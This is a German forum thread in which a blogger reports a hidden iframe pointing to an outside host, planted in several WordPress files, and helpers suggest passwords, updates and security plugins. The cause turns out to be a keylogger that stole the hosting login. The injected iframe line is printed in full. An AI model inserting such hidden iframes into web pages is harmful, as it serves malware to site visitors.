Fehlermeldung bei Wordpress -> Trojanerwarnung

[Cicatrix]

Hoi...

Hab vorhin meinen Blog aufgerufen und nur Php-Fehlermeldungen bekommen. Irgendwas in der index.php soll kaputt sein, was mir die Fehlermeldung grad nicht gemerkt. Hab nachgeguckt und eine Zeile gefunden die ich nie eingefügt habe:

PHP-Code:

<iframe src="http://c6p.at:8080/ts/in.cgi?pepsi140" width=125 height=125 style="visibility: hidden"></iframe> 


Die war in insgesamt 3 Dateien vorhanden (/index.php, /wp-includes/default-widgets.php und in der index.php meines aktuellen Themes). Nachdem ich die /index.php etwas abgeändert habe kam auch direkt eine Trojanerwarnung von Avira AV.

Hab die Zeilen nun alle entfernt und verlorenen Code in den Dateien ersetzt. Mein Problem ist nur, dass das so gestern abend noch nicht da war und somit irgendwer oder irgendwas Zugriff auf meinen Webspace hatte und die Dateien verändern konnte. Google und auch die Supportseite von Wordpress haben mir momentan noch nicht wirklich weitergeholfen, von daher wollte ich hier mal fragen wie ich so etwas vermeiden kann. Hab den Blog erst gestern erstellt, von daher hab ich da noch keinen Schimmer von.
Würde mich sehr über Hilfe freuen, da ich soetwas gerne vermeiden würde.^^

Edit: Wenn weitere Informtionen benötigt werden einfach melden.

Edit2: Korrigiere, es sind (mindestens) 4 Dateien geändert worden. Nachdem ich mich jetzt eingeloggt habe gibt es auch noch eine Fehlermeldung für /wp-admin/index.php... die gleiche Zeile ist mal wieder drin.

[meTaeH]

Sichere Passwörter (zahlen, sonderzeichen, groß und kleinschreibung, webspace pw und wordpress pw bitte nicht die selben)
Wordpress Updaten - Welche Version hast du überhaupt?
eventuell .htaccess

Für Wordpress gibt es auch ein paar gute Security Plugin ( Wordpress Security Scanner | Webmaster, Security und Technik Blog )

Du kannst den Code so oft löschen wie du willst, entweder hat der jenigie dein Passwort oder bzw. hat sich einen zweiten Account angelegt.

[Cicatrix]

Wordpress Updaten - Welche Version hast du überhaupt?

2.8.3. Hab gerade auf 2.8.4 geupdatet (was für ein Wort).
Werd dann wohl gleich mal die Passwörter ändern, sicher ist sicher. Die Plugins werd' ich mir auch gleich mal anschauen, danke für den Link.

edit: im übrigen hat sich das problem immer noch nicht erledigt. -.-
hat jemand eine idee was das ist, woher es kommt und wie man es unterdrückt?

edit2: das problem scheint gelöst. vergangene nacht gabs mal keine kuriosen zeilen in diversen dateien. das problem lag scheinbar in einer infizierung des eigenen rechners durch einen keylogger, der die logindaten für den webspace verschickt hatte. ein ändern des passwortes hatte von daher auch nichts gebracht.
wer dies ebenfalls haben sollte findet eventuell unter folgendem link ein paar mehr informationen und hilfe:
Possible Server Compromise! - Free Web Hosting Forum